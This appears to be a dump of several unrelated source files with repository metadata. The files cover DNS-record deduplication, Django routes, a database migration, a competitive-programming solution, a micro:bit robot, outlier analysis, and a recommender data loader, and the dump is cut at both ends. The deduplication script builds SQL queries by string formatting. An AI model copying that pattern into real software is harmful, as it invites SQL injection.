domain =item[0]
sql = 'select id from (select id from dns_answer where domain_name = "{0}" and ip in ' \
'(SELECT ip FROM dns_answer where domain_name = "{0}" group by ip having count(*) >=1)) ta ' \
'where id != (select MIN(id) from dns_answer where domain_name = "{0}" and ip in ' \
'(SELECT ip FROM dns_answer where domain_name = "{0}" group by ip having count(*) >1))'\
.format(domain)
res = query_db(conn, sql)
if len(res) == 0:
continue
print("domain: %s, duplicate_ids:%s" % (domain, affected_ids))
for index, item in enumerate(res):
affected_id = int(item[0])
affected_ids.append(affected_id)
return affected_ids
if __name__ == "__main__":
affected_ids = remove_double()
if len(affected_ids) > 0:
del_sql = "delete from dns_answer where id in ("
for index, affected_id in enumerate(affected_ids):
if index == 0:
del_sql += "%s" % (affected_id,)
else:
del_sql += ", %s" % (affected_id)
del_sql += ")"
print(del_sql)
delete_db(conn, del_sql)
conn.close() | UTF-8 | Python | false | false | 1,463 | py | 70 | remove_duplicate.py | 39 | 0.546822 | 0.539303 | 0 | 40 | 35.6 | 108 |
Raghav-Sao/Places | 13,469,017,455,081 | b8c3a0d66b4ca304d2adb0016d2c132f1622b397 | e04dbf0a3fd4caee19161ed4c65c8eb4ba78db09 | /places/urls.py | c7fcc030f3e8a210dfe8c26aba67d07a2ce4df70 | []
| no_license | https://github.com/Raghav-Sao/Places | 76633d73d5ce8fabe32ef0d2a07387ddadd13894 | ad815681944278b6eaa72e6991788d654f051404 | refs/heads/master | 2021-01-19T02:39:09.264944 | 2016-07-15T07:44:05 | 2016-07-15T07:44:05 | 62,582,934 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.conf.urls import include, url
import views
urlpatterns = [
url('add-place', views.add_place, name="add-place"),
url(r'^(?P<place_id>[0-9]+)/$', views.place_details, name="place-details"),
url('^$', views.places, name="places"),
] | UTF-8 | Python | false | false | 251 | py | 6 | urls.py | 6 | 0.649402 | 0.641434 | 0 | 8 | 30.5 | 79 |
sand8080/helixbilling | 1,743,756,764,272 | dd276bb1a4e7ac1658be41ef1ce996e5f1a176ca | b52ac748b10f003301fd53499a71a584f6ef27db | /src/patches/4.py | 637775dea0679cf2f4538aada4503801ef81c0d8 | []
| no_license | https://github.com/sand8080/helixbilling | 2ff8bb0bdb67d19920b04f4435c4cbc412d3eb16 | 17e2c61bab8be8299d9ea2c4ef84a0789b2d5a5a | refs/heads/master | 2016-09-06T11:16:10.565134 | 2012-07-13T13:39:49 | 2012-07-13T13:41:40 | 1,605,061 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def apply(curs):
print 'Creating table balance'
curs.execute(
'''
CREATE TABLE balance (
id serial,
PRIMARY KEY(id),
environment_id integer NOT NULL,
is_active boolean NOT NULL DEFAULT True,
user_id integer NOT NULL,
currency_id int NOT NULL,
FOREIGN KEY(currency_id) REFERENCES currency(id),
real_amount NUMERIC DEFAULT 0,
virtual_amount NUMERIC DEFAULT 0,
locked_amount NUMERIC DEFAULT 0,
overdraft_limit NUMERIC DEFAULT 0
)
''')
print 'Creating index balance_environment_id_idx on balance'
curs.execute(
'''
CREATE INDEX balance_environment_id_idx ON balance(environment_id)
''')
print 'Creating index balance_environment_id_user_id_idx on balance'
curs.execute(
'''
CREATE INDEX balance_environment_id_user_id_idx ON balance(environment_id, user_id)
''')
print 'Creating unique index balance_environment_id_user_id_currency_id_idx on balance'
curs.execute(
'''
CREATE UNIQUE INDEX balance_environment_id_user_id_currency_id_idx ON
balance(environment_id, user_id, currency_id)
''')
def revert(curs):
print 'Dropping index balance_environment_id_idx on balance'
curs.execute('DROP INDEX IF EXISTS balance_environment_id_idx')
print 'Dropping index balance_environment_id_user_id_idx on balance'
curs.execute('DROP INDEX IF EXISTS balance_environment_id_user_id_idx')
print 'Dropping unique index balance_environment_id_user_id_currency_id_idx on balance'
curs.execute('DROP INDEX IF EXISTS balance_environment_id_user_id_currency_id_idx')
print 'Dropping table balance'
curs.execute('DROP TABLE IF EXISTS balance')
| UTF-8 | Python | false | false | 1,807 | py | 39 | 4.py | 35 | 0.65855 | 0.656336 | 0 | 51 | 34.411765 | 91 |
yofn/pyacm | 755,914,289,108 | a51a259899cbd8338b5217a6a03b5618c4a177ab | a4456d808b4c72574a11c88282920a917b076f5b | /codeforces/matrix矩阵/1900/222E基因编码.py | 5dd4c560f30d353f348cca03966c4d80da017bf2 | [
"Apache-2.0"
]
| permissive | https://github.com/yofn/pyacm | 635f3b17cc08d9e702b561f9582fec4d694458b1 | e573f8fdeea77513711f00c42f128795cbba65a6 | refs/heads/master | 2023-07-09T02:11:31.044020 | 2021-08-10T02:02:24 | 2021-08-10T02:02:24 | 270,663,600 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python3
#https://codeforces.com/problemset/problem/222/E
q = int(1e9)+7
mul=lambda A,B,r:[[sum([(A[i][k]*B[k][j])%q for k in r]) for j in r] for i in r]
def binpower(A,e):
r = range(len(A))
B = A
e -= 1
while True:
if e &1: B = mul(B,A,r)
e =e>>1
if e==0: break
A =mul(A,A,r)
return B
c2i = lambda c: ord(c)-ord('a') if c.islower() else ord(c)-ord('A')+26
def f(l1,l2):
n,m,_ = l1
if n==1: return m
M = [[1]*m for _ in range(m)]
for s in l2:
i = c2i(s[0])
j = c2i(s[1])
M[i][j]=0
return sum([sum(l) for l in binpower(M,n-1)])
l1 = list(map(int,input().split()))
l2 = [input() for _ in range(l1[2])]
print(f(l1,l2)%q)
| UTF-8 | Python | false | false | 742 | py | 712 | 222E基因编码.py | 703 | 0.491914 | 0.448787 | 0 | 32 | 22.15625 | 80 |
Claayton/ExerciciosPython | 14,250,701,492,780 | 7647ab5aa96186ff744481a8398c4877840e3dbe | 69e828d2675c0d677daf2b98ed49367fa4c4a68b | /reworked exercices/ex061.2.py | 27d118338b33dece54c31682cb77e683382b5854 | [
"MIT"
]
| permissive | https://github.com/Claayton/ExerciciosPython | 42f9978fffdb350799c1e6756bbfcf1f9f82bd6c | 696cdb16983638418bd0d0d4fe44dc72662b9c97 | refs/heads/master | 2023-03-08T03:21:25.364757 | 2021-08-04T15:07:20 | 2021-08-04T15:07:20 | 331,656,108 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Ex061.2
"""Redo challenge 061, reading the first term and the ratio of an PA
Showing the first 10 terms of the progression using the while function."""
cont = 0
pa = 0
print(f'\033[7:40m{"="}\033[m' * 40)
print(f'{"10 TERMS OF A PA":^40}')
print(f'\033[7:40m{"="}\033[m' * 40)
first = int(input('What is the first term of a PA?: '))
ratio = int(input('What is the ratio of a PA?:'))
while cont < 10:
cont += 1
if cont == 1:
pa = first
print(pa, end=' \033[32m> \033[m')
pa += ratio
print('TheEnd')
print(f'\033[7:40m{"="}\033[m' * 40)
| UTF-8 | Python | false | false | 562 | py | 253 | ex061.2.py | 250 | 0.601423 | 0.494662 | 0 | 19 | 28.578947 | 74 |
WitalyK/CHA | 10,093,173,183,364 | 22be173e34ead61935a747c6aa534f89176f19fd | ec261cffed94d54c1c8f0140ed046d2d24b21e8f | /92/Click_me_NEW.py | fc13be301fd30a8128029522a839dfb937ba6cc2 | []
| no_license | https://github.com/WitalyK/CHA | 7dd51e82b07a6c9cdee08ff7a1625b9976c24ecd | ce20d2501c2174dfde1be2320ccc459262fcf09c | refs/heads/master | 2020-09-08T01:43:23.845841 | 2020-03-02T06:14:28 | 2020-03-02T06:14:28 | 220,974,443 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
from datetime import datetime, timedelta
from re import finditer
from shutil import copy
from subprocess import run, PIPE
d_corr = False
zag = '''wait operator 0 * * * * *
wait operator 0
'''
while not d_corr:
d = input('Введите дату необходимого отработанного плейлиста в формате ДД.ММ.ГГГГ:')
dd = [num for num in d.split('.') if num.isdigit()]
if len(dd)==3:
if len(dd[2])==4 and len(dd[1])==2 and len(dd[0])==2:
try:
d1 = datetime(int(dd[2]), int(dd[1]), int(dd[0])) + timedelta(days=1)
d1 = "{:%d:%m:%Y}".format(d1)
d_corr = True
except ValueError:
d_corr = False
airlog = 'air1_'+d1[6:]+d1[3:5]+d1[0:2]+'.log'
try:
run(['net', 'use', '\\\\192.168.0.92', '/user:onair0', '3A9b'], stdout=PIPE,
stderr=PIPE, shell=True)
copy('\\\\192.168.0.92\D$\ForwardData\\'+airlog, airlog)
with open(airlog) as log1, open('otrabot_za_'+dd[0]+'_'+dd[1]+'_'+dd[2]+'_92.air', 'w') as air:
regex = (r'\d{2}:\d{2}:\d{2}\.\d{2} (?:Script take:|Script skip:).+ \[ (.+) \]')
air.write(zag)
air.write(''.join([match.group(1)+'\n' for match in finditer(regex, log1.read())]))
except FileNotFoundError:
print('Необходим файл: '+airlog)
input('Нажмите ENTER и прощайте.')
| UTF-8 | Python | false | false | 1,431 | py | 128 | Click_me_NEW.py | 105 | 0.554064 | 0.510067 | 0 | 38 | 34.289474 | 99 |
ncss/projects-2017-7 | 11,287,174,059,345 | 306077130e6a81690c7744f5f44a67f1083e67d8 | e967478ad1d27981b5bd01992f7c7067dfc3cd63 | /BLAA/Robot Scorer.py | fe2841418c616ac6b57fc4aa44fda0ff3cf4d17d | []
| no_license | https://github.com/ncss/projects-2017-7 | fc26c01c69e3377566dd31792b03d4a5e12b74da | d996f26ffa611f57182be99290ba7e395067f3b2 | refs/heads/master | 2021-01-11T18:20:11.668950 | 2017-02-01T03:54:38 | 2017-02-01T03:54:38 | 75,157,337 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from microbit import *
import radio
def forward():
pin0.write_digital(1)
pin16.write_digital(0)
pin12.write_digital(0)
pin8.write_digital(1)
def backward():
pin0.write_digital(0)
pin16.write_digital(1)
pin12.write_digital(1)
pin8.write_digital(0)
def left():
pin0.write_digital(1)
pin16.write_digital(0)
pin12.write_digital(1)
pin8.write_digital(0)
def right():
pin0.write_digital(0)
pin16.write_digital(1)
pin12.write_digital(0)
pin8.write_digital(1)
def stop():
pin0.write_digital(0)
pin16.write_digital(0)
pin12.write_digital(0)
pin8.write_digital(0)
radio.on()
radio.config(channel = 65,
address=0x6e637373)
while True:
message = radio.receive()
if message == "Robot1":
forward()
sleep(1000)
stop()
if message == "Robot2":
backward()
sleep(1000)
stop()
| UTF-8 | Python | false | false | 904 | py | 24 | Robot Scorer.py | 17 | 0.625 | 0.547566 | 0 | 46 | 18.652174 | 29 |
hcliu08/competition | 11,965,778,904,437 | 8d3fff0c91efea618100538fa16177a6e1b23539 | 6f9d082ab5a9875c7b13531d6b13f9274f1ba3eb | /Data Scope/Kaggle Competition Outlier Z-score.py | 7e4cc44698813b75c243299b9f9f053f59166dfb | []
| no_license | https://github.com/hcliu08/competition | 5b5c2f3a182442b19332cf33667a3c5b3f7fb4ab | a8e0e3ad678ab14c25c29451e29a9a93cc8299cf | refs/heads/master | 2020-04-27T03:35:52.508077 | 2019-03-29T00:02:43 | 2019-03-29T00:02:43 | 174,028,929 | 0 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# coding: utf-8
# In[1]:
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
# In[2]:
#Import Data
df_train = pd.read_csv('/Users/yuzhenhe/Desktop/train.csv')
df_test = pd.read_csv('/Users/yuzhenhe/Desktop/test.csv')
# In[7]:
#Drop Columns Target and ID_code
train_X = df_train.drop(columns=['target','ID_code'])
# In[8]:
#Build a dataset with the standardized values
from sklearn import preprocessing
names = train_X.columns
scaler = preprocessing.StandardScaler()
scaled_list = scaler.fit_transform(train_X)
scaled_df = pd.DataFrame(scaled_list, columns=names)
# In[9]:
#Transpose dataset
scaled_X_T = scaled_df.T
scaled_X_L = scaled_X_T.values.tolist()
group = df_train['target'].values.tolist()
# In[10]:
#Get the outliner of each column
outliner_index = []
outliner_count = []
outliner_unique = []
for k in scaled_X_L:
p = [i for i, e in enumerate(k) if abs(e)>2.5 ]
r = len(p)
t = list(np.array(group)[p])
outliner_index.append(p)
outliner_count.append(r)
outliner_unique = outliner_unique + p
# In[11]:
#Retain the unique outliner index
dic = {}
for i in outliner_index:
for j in i:
if j in dic:
dic[j] += 1
else:
dic[j] = 1
# In[12]:
dic
| UTF-8 | Python | false | false | 1,289 | py | 4 | Kaggle Competition Outlier Z-score.py | 4 | 0.649341 | 0.636928 | 0 | 79 | 15.291139 | 59 |
jiesen-zhang/ds-algorithms | 3,221,225,474,432 | 70513ca4c74195dbbabc8dcbc87deb6b2a810bfc | 88a1dbcbd3ef9f5b4b2168133d0fbb24c5ab05e9 | /search-algo/binary-search.py | 3e92c6d94fb05b80474f413661fe2478c6d67961 | []
| no_license | https://github.com/jiesen-zhang/ds-algorithms | 845acd61041da6be50f5a42c307b859503a1aad3 | c1463b4b319c467483e374cd9291952e5db281b3 | refs/heads/main | 2023-06-28T14:36:57.979276 | 2021-07-22T17:35:41 | 2021-07-22T17:35:41 | 388,284,417 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | '''
Binary Search
Returns the index for the target element. If target element is not found, returns index of where it would be in sorted array.
Time: O(n)
Space: O(1)
'''
def binarySearch(nums: [int], target: int) -> int:
if len(nums) == 1:
return 0 if target <= nums[0] else 1
left, right = 0, len(nums) - 1
while(left <= right):
mid = (left + right) // 2
if target == nums[mid]:
return mid
elif target > nums[mid]:
left = mid + 1
else:
right = mid - 1
return left
nums = [1, 2, 3, 4]
target = 0
print(binarySearch(nums, target))
| UTF-8 | Python | false | false | 593 | py | 2 | binary-search.py | 1 | 0.595278 | 0.569983 | 0 | 28 | 20.178571 | 125 |
nistpenning/calc | 17,549,236,386,207 | 27182bac3d830c5a13377852ffd4f8ac3b0b2b80 | aff5cc92f38213a45323d7dede291dd918e96519 | /analysis/Angular_Momentum/Triangle.py | cf8750235f9b1cf5d8201a085e33bb020020e234 | []
| no_license | https://github.com/nistpenning/calc | bd475b75a36ba93e74356a37529d0f9dac30a083 | 15d651bcc5c067032041b5ad9cf0be38169bb750 | refs/heads/master | 2021-01-18T22:59:31.619436 | 2015-11-03T23:44:05 | 2015-11-03T23:44:05 | 32,483,830 | 3 | 1 | null | false | 2015-06-17T16:58:16 | 2015-03-18T20:54:43 | 2015-06-10T02:53:48 | 2015-06-17T16:58:16 | 482 | 2 | 0 | 0 | Matlab | null | null | """
Tests the triangle inequalities in Messiah, A. "Quantum Mechanics" v. 2,
pg. 1062 (North-Holland, Amsterdam) 1962. Returns True if the inequalities
are satisfied, false if not. Also tests if the triad sums to an integer
Written: KAE University at Albany Physics Department 26 Oct 08
"""
from numpy import *
def Triangle(x,y,z):
if ((abs(x-y) <= z) and (z <= x+y) and (floor(x+y+z) == x+y+z)):
test = True
else:
test = False
return test
| UTF-8 | Python | false | false | 476 | py | 122 | Triangle.py | 52 | 0.653361 | 0.62605 | 0 | 18 | 25.444444 | 75 |
wengyuanwy/Generative-Adversarial-User-Model-for-Reinforcement-Learning-Based-Recommendation-System-Pytorch | 5,085,241,319,587 | 587858b491e17bae3a6398c8dd075d777c33ffa4 | 53081aae2779bb4d5253a18fc2c7126081050445 | /data_utils.py | 97d802a8375e24e1f65ac01b14c7c74397db9c53 | [
"MIT"
]
| permissive | https://github.com/wengyuanwy/Generative-Adversarial-User-Model-for-Reinforcement-Learning-Based-Recommendation-System-Pytorch | 630bf76ad383679345cb427cf6170ee69ba5eb4f | 4e5479c4ff4c200fc3171c2c058893cb0bebe73d | refs/heads/master | 2023-02-22T03:23:26.526124 | 2021-01-30T12:55:44 | 2021-01-30T12:55:44 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from past.builtins import xrange
import pickle
import numpy as np
import os
# almost similar to the original implementations
class Dataset(object):
"""docstring for Dataset"""
def __init__(self, args):
super(Dataset, self).__init__()
self.data_folder = args.data_folder
self.dataset = args.dataset
self.model_type = args.user_model
self.band_size = args.pw_band_size
#load the data
data_filename = os.path.join(args.data_folder, args.dataset+'.pkl')
f = open(data_filename, 'rb')
data_behavior = pickle.load(f) # time and user behavior
item_feature = pickle.load(f) # identity matrix
f.close()
self.size_item = len(item_feature)
self.size_user = len(data_behavior)
self.f_dim = len(item_feature[0])
# load the index fo train,test,valid split
filename = os.path.join(self.data_folder, self.dataset+'-split.pkl')
pkl_file = open(filename, 'rb')
self.train_user = pickle.load(pkl_file)
self.vali_user = pickle.load(pkl_file)
self.test_user = pickle.load(pkl_file)
pkl_file.close()
# process the data
# get the most no of suggetion for an individual at a time
k_max = 0
for d_b in data_behavior:
for disp in d_b[1]:
k_max = max(k_max, len(disp))
self.data_click = [[] for x in xrange(self.size_user)]
self.data_disp = [[] for x in xrange(self.size_user)]
self.data_time = np.zeros(self.size_user, dtype=np.int)
self.data_news_cnt = np.zeros(self.size_user, dtype=np.int)
self.feature = [[] for x in xrange(self.size_user)]
self.feature_click = [[] for x in xrange(self.size_user)]
for user in xrange(self.size_user):
# (1) count number of clicks
click_t = 0
num_events = len(data_behavior[user][1])
click_t += num_events
self.data_time[user] = click_t
# (2)
news_dict = {}
self.feature_click[user] = np.zeros([click_t, self.f_dim])
click_t = 0
for event in xrange(num_events):
disp_list = data_behavior[user][1][event]
pick_id = data_behavior[user][2][event]
for id in disp_list:
if id not in news_dict:
news_dict[id] = len(news_dict) # for each user, news id start from 0
id = pick_id
self.data_click[user].append([click_t, news_dict[id]])
self.feature_click[user][click_t] = item_feature[id]
for idd in disp_list:
self.data_disp[user].append([click_t, news_dict[idd]])
click_t += 1 # splitter a event with 2 clickings to 2 events
self.data_news_cnt[user] = len(news_dict)
self.feature[user] = np.zeros([self.data_news_cnt[user], self.f_dim])
for id in news_dict:
self.feature[user][news_dict[id]] = item_feature[id]
self.feature[user] = self.feature[user].tolist()
self.feature_click[user] = self.feature_click[user].tolist()
self.max_disp_size = k_max
def random_split_user(self):
# dont think this one is really necessary if the initial split is random enough
num_users = len(self.train_user) + len(self.vali_user) + len(self.test_user)
shuffle_order = np.arange(num_users)
np.random.shuffle(shuffle_order)
self.train_user = shuffle_order[0:len(self.train_user)].tolist()
self.vali_user = shuffle_order[len(self.train_user):len(self.train_user)+len(self.vali_user)].tolist()
self.test_user = shuffle_order[len(self.train_user)+len(self.vali_user):].tolist()
def data_process_for_placeholder(self, user_set):
#print ("user_set",user_set)
if self.model_type == 'PW':
sec_cnt_x = 0
news_cnt_short_x = 0
news_cnt_x = 0
click_2d_x = []
disp_2d_x = []
tril_indice = []
tril_value_indice = []
disp_2d_split_sec = []
feature_clicked_x = []
disp_current_feature_x = []
click_sub_index_2d = []
# started with the validation set
#print (user_set)
#[703, 713, 723, 733, 743, 753, 763, 773, 783, 793, 803, 813, 823, 833, 843, 853, 863, 873, 883, 893, 903, 913, 923, 933, 943, 953, 963, 973, 983, 993, 1003, 1013, 1023, 1033, 1043, 1053]
#user_set = [703]
for u in user_set:
t_indice = []
#print ("the us is ",u) 703
#print (self.band_size,self.data_time[u]) 20,1
#print ("the loop",self.data_time[u]-1)
for kk in xrange(min(self.band_size-1, self.data_time[u]-1)):
t_indice += map(lambda x: [x + kk+1 + sec_cnt_x, x + sec_cnt_x], np.arange(self.data_time[u] - (kk+1)))
# print (t_indice) [] for 703
tril_indice += t_indice
tril_value_indice += map(lambda x: (x[0] - x[1] - 1), t_indice)
#print ("THE Click data is ",self.data_click[u]) #THE Click data is [[0, 0], [1, 8], [2, 14]] for u =15
click_2d_tmp = map(lambda x: [x[0] + sec_cnt_x, x[1]], self.data_click[u])
click_2d_tmp = list(click_2d_tmp)
#print (list(click_2d_tmp))
#print (list(click_2d_tmp))
click_2d_x += click_2d_tmp
#print ("tenp is ",click_2d_x,list(click_2d_tmp)) # [[0, 0], [1, 8], [2, 14]] for u15
#print ("dispaly data is ", self.data_disp[u]) [0,0]
disp_2d_tmp = map(lambda x: [x[0] + sec_cnt_x, x[1]], self.data_disp[u])
disp_2d_tmp = list(disp_2d_tmp)
#y=[]
#y+=disp_2d_tmp
#print (disp_2d_tmp, click_2d_tmp)
click_sub_index_tmp = map(lambda x: disp_2d_tmp.index(x), (click_2d_tmp))
click_sub_index_tmp = list(click_sub_index_tmp)
#print ("the mess is ",click_sub_index_tmp)
click_sub_index_2d += map(lambda x: x+len(disp_2d_x), click_sub_index_tmp)
#print ("click_sub_index_2d",click_sub_index_2d)
disp_2d_x += disp_2d_tmp
#print ("disp_2d_x",disp_2d_x) # [[0, 0]]
#sys.exit()
disp_2d_split_sec += map(lambda x: x[0] + sec_cnt_x, self.data_disp[u])
sec_cnt_x += self.data_time[u]
news_cnt_short_x = max(news_cnt_short_x, self.data_news_cnt[u])
news_cnt_x += self.data_news_cnt[u]
disp_current_feature_x += map(lambda x: self.feature[u][x], [idd[1] for idd in self.data_disp[u]])
feature_clicked_x += self.feature_click[u]
out1 ={}
out1['click_2d_x']=click_2d_x
out1['disp_2d_x']=disp_2d_x
out1['disp_current_feature_x']=disp_current_feature_x
out1['sec_cnt_x']=sec_cnt_x
out1['tril_indice']=tril_indice
out1['tril_value_indice']=tril_value_indice
out1['disp_2d_split_sec']=disp_2d_split_sec
out1['news_cnt_short_x']=news_cnt_short_x
out1['click_sub_index_2d']=click_sub_index_2d
out1['feature_clicked_x']=feature_clicked_x
# print ("out",out1['tril_value_indice'])
# sys.exit()
return out1
else:
news_cnt_short_x = 0
u_t_dispid = []
u_t_dispid_split_ut = []
u_t_dispid_feature = []
u_t_clickid = []
size_user = len(user_set)
max_time = 0
click_sub_index = []
for u in user_set:
max_time = max(max_time, self.data_time[u])
user_time_dense = np.zeros([size_user, max_time], dtype=np.float32)
click_feature = np.zeros([max_time, size_user, self.f_dim])
for u_idx in xrange(size_user):
u = user_set[u_idx]
u_t_clickid_tmp = []
u_t_dispid_tmp = []
for x in self.data_click[u]:
t, click_id = x
click_feature[t][u_idx] = self.feature[u][click_id]
u_t_clickid_tmp.append([u_idx, t, click_id])
user_time_dense[u_idx, t] = 1.0
u_t_clickid = u_t_clickid + u_t_clickid_tmp
for x in self.data_disp[u]:
t, disp_id = x
u_t_dispid_tmp.append([u_idx, t, disp_id])
u_t_dispid_split_ut.append([u_idx, t])
u_t_dispid_feature.append(self.feature[u][disp_id])
click_sub_index_tmp = map(lambda x: u_t_dispid_tmp.index(x), u_t_clickid_tmp)
click_sub_index += map(lambda x: x+len(u_t_dispid), click_sub_index_tmp)
u_t_dispid = u_t_dispid + u_t_dispid_tmp
news_cnt_short_x = max(news_cnt_short_x, self.data_news_cnt[u])
if self.model_type != 'LSTM':
print('model type not supported. using LSTM')
out = {}
out['size_user']=size_user
out['max_time']=max_time
out['news_cnt_short_x']=news_cnt_short_x
out['u_t_dispid']=u_t_dispid
out['u_t_dispid_split_ut']=u_t_dispid_split_ut
out['u_t_dispid_feature']=np.array(u_t_dispid_feature)
out['click_feature']=click_feature
out['click_sub_index']=click_sub_index
out['u_t_clickid']=u_t_clickid
out['user_time_dense']=user_time_dense
return out
def data_process_for_placeholder_L2(self, user_set):
news_cnt_short_x = 0
u_t_dispid = []
u_t_dispid_split_ut = []
u_t_dispid_feature = []
u_t_clickid = []
size_user = len(user_set)
max_time = 0
click_sub_index = []
for u in user_set:
max_time = max(max_time, self.data_time[u])
user_time_dense = np.zeros([size_user, max_time], dtype=np.float32)
click_feature = np.zeros([max_time, size_user, self.f_dim])
for u_idx in xrange(size_user):
u = user_set[u_idx]
item_cnt = [{} for _ in xrange(self.data_time[u])]
u_t_clickid_tmp = []
u_t_dispid_tmp = []
for x in self.data_disp[u]:
t, disp_id = x
u_t_dispid_split_ut.append([u_idx, t])
u_t_dispid_feature.append(self.feature[u][disp_id])
if disp_id not in item_cnt[t]:
item_cnt[t][disp_id] = len(item_cnt[t])
u_t_dispid_tmp.append([u_idx, t, item_cnt[t][disp_id]])
for x in self.data_click[u]:
t, click_id = x
click_feature[t][u_idx] = self.feature[u][click_id]
u_t_clickid_tmp.append([u_idx, t, item_cnt[t][click_id]])
user_time_dense[u_idx, t] = 1.0
u_t_clickid = u_t_clickid + u_t_clickid_tmp
click_sub_index_tmp = map(lambda x: u_t_dispid_tmp.index(x), u_t_clickid_tmp)
click_sub_index += map(lambda x: x+len(u_t_dispid), click_sub_index_tmp)
u_t_dispid = u_t_dispid + u_t_dispid_tmp
# news_cnt_short_x = max(news_cnt_short_x, data_news_cnt[u])
news_cnt_short_x = self.max_disp_size
out = {}
out['size_user']=size_user
out['max_time']=max_time
out['news_cnt_short_x']=news_cnt_short_x
out['u_t_dispid']=u_t_dispid
out['u_t_dispid_split_ut']=u_t_dispid_split_ut
out['u_t_dispid_feature']=np.array(u_t_dispid_feature)
out['click_feature']=click_feature
out['click_sub_index']=click_sub_index
out['u_t_clickid']=u_t_clickid
out['user_time_dense']=user_time_dense
return out
def prepare_validation_data_L2(self, num_sets, v_user):
vali_thread_u = [[] for _ in xrange(num_sets)]
size_user_v = [[] for _ in xrange(num_sets)]
max_time_v = [[] for _ in xrange(num_sets)]
news_cnt_short_v = [[] for _ in xrange(num_sets)]
u_t_dispid_v = [[] for _ in xrange(num_sets)]
u_t_dispid_split_ut_v = [[] for _ in xrange(num_sets)]
u_t_dispid_feature_v = [[] for _ in xrange(num_sets)]
click_feature_v = [[] for _ in xrange(num_sets)]
click_sub_index_v = [[] for _ in xrange(num_sets)]
u_t_clickid_v = [[] for _ in xrange(num_sets)]
ut_dense_v = [[] for _ in xrange(num_sets)]
for ii in xrange(len(v_user)):
vali_thread_u[ii % num_sets].append(v_user[ii])
for ii in xrange(num_sets):
out=self.data_process_for_placeholder_L2(vali_thread_u[ii])
size_user_v[ii], max_time_v[ii], news_cnt_short_v[ii], u_t_dispid_v[ii],\
u_t_dispid_split_ut_v[ii], u_t_dispid_feature_v[ii], click_feature_v[ii], \
click_sub_index_v[ii], u_t_clickid_v[ii], ut_dense_v[ii] = out['size_user'],\
out['max_time'],\
out['news_cnt_short_x'],\
out['u_t_dispid'], \
out['u_t_dispid_split_ut'],\
out['u_t_dispid_feature'],\
out['click_feature'],\
out['click_sub_index'],\
out['u_t_clickid'],\
out['user_time_dense']
out2={}
out2['vali_thread_u']=vali_thread_u
out2['size_user_v']=size_user_v
out2['max_time_v']=max_time_v
out2['news_cnt_short_v'] =news_cnt_short_v
out2['u_t_dispid_v'] =u_t_dispid_v
out2['u_t_dispid_split_ut_v']=u_t_dispid_split_ut_v
out2['u_t_dispid_feature_v']=u_t_dispid_feature_v
out2['click_feature_v']=click_feature_v
out2['click_sub_index_v']=click_sub_index_v
out2['u_t_clickid_v']=u_t_clickid_v
out2['ut_dense_v']=ut_dense_v
return out2
def prepare_validation_data(self, num_sets, v_user):
if self.model_type == 'PW':
vali_thread_u = [[] for _ in xrange(num_sets)]
click_2d_v = [[] for _ in xrange(num_sets)]
disp_2d_v = [[] for _ in xrange(num_sets)]
feature_v = [[] for _ in xrange(num_sets)]
sec_cnt_v = [[] for _ in xrange(num_sets)]
tril_ind_v = [[] for _ in xrange(num_sets)]
tril_value_ind_v = [[] for _ in xrange(num_sets)]
disp_2d_split_sec_v = [[] for _ in xrange(num_sets)]
feature_clicked_v = [[] for _ in xrange(num_sets)]
news_cnt_short_v = [[] for _ in xrange(num_sets)]
click_sub_index_2d_v = [[] for _ in xrange(num_sets)]
for ii in xrange(len(v_user)):
vali_thread_u[ii % num_sets].append(v_user[ii])
for ii in xrange(num_sets):
out=self.data_process_for_placeholder(vali_thread_u[ii])
# print ("out_val",out['tril_indice'])
# sys.exit()
click_2d_v[ii], disp_2d_v[ii], feature_v[ii], sec_cnt_v[ii], tril_ind_v[ii], tril_value_ind_v[ii], \
disp_2d_split_sec_v[ii], news_cnt_short_v[ii], click_sub_index_2d_v[ii], feature_clicked_v[ii] = out['click_2d_x'], \
out['disp_2d_x'], \
out['disp_current_feature_x'], \
out['sec_cnt_x'], \
out['tril_indice'], \
out['tril_value_indice'], \
out['disp_2d_split_sec'], \
out['news_cnt_short_x'], \
out['click_sub_index_2d'], \
out['feature_clicked_x']
out2={}
out2['vali_thread_u']=vali_thread_u
out2['click_2d_v']=click_2d_v
out2['disp_2d_v']=disp_2d_v
out2['feature_v']=feature_v
out2['sec_cnt_v']=sec_cnt_v
out2['tril_ind_v']=tril_ind_v
out2['tril_value_ind_v']=tril_value_ind_v
out2['disp_2d_split_sec_v']=disp_2d_split_sec_v
out2['news_cnt_short_v']=news_cnt_short_v
out2['click_sub_index_2d_v']=click_sub_index_2d_v
out2['feature_clicked_v']=feature_clicked_v
return out2
else:
if self.model_type != 'LSTM':
print('model type not supported. using LSTM')
vali_thread_u = [[] for _ in xrange(num_sets)]
size_user_v = [[] for _ in xrange(num_sets)]
max_time_v = [[] for _ in xrange(num_sets)]
news_cnt_short_v = [[] for _ in xrange(num_sets)]
u_t_dispid_v = [[] for _ in xrange(num_sets)]
u_t_dispid_split_ut_v = [[] for _ in xrange(num_sets)]
u_t_dispid_feature_v = [[] for _ in xrange(num_sets)]
click_feature_v = [[] for _ in xrange(num_sets)]
click_sub_index_v = [[] for _ in xrange(num_sets)]
u_t_clickid_v = [[] for _ in xrange(num_sets)]
ut_dense_v = [[] for _ in xrange(num_sets)]
for ii in xrange(len(v_user)):
vali_thread_u[ii % num_sets].append(v_user[ii])
for ii in xrange(num_sets):
out = self.data_process_for_placeholder(vali_thread_u[ii])
size_user_v[ii], max_time_v[ii], news_cnt_short_v[ii], u_t_dispid_v[ii],\
u_t_dispid_split_ut_v[ii], u_t_dispid_feature_v[ii], click_feature_v[ii], \
click_sub_index_v[ii], u_t_clickid_v[ii], ut_dense_v[ii] = out['click_2d_x'], \
out['disp_2d_x'], \
out['disp_current_feature_x'], \
out['sec_cnt_x'], \
out['tril_indice'], \
out['tril_value_indice'], \
out['disp_2d_split_sec'], \
out['news_cnt_short_x'], \
